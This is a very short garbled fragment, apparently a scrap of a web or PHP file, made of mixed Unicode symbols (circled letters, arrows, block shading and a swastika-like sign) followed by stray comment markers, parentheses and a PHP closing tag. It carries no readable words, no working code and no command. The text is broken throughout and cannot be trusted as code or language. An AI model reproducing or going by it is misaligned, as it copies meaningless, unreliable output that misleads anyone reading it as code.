<a:O₪⌔卍Ⓓ⊤➧Ⓥ≐➠♦ⓓℜ⓽▓❊⒦


-*///
();/*-:%kJ-*///
 ?>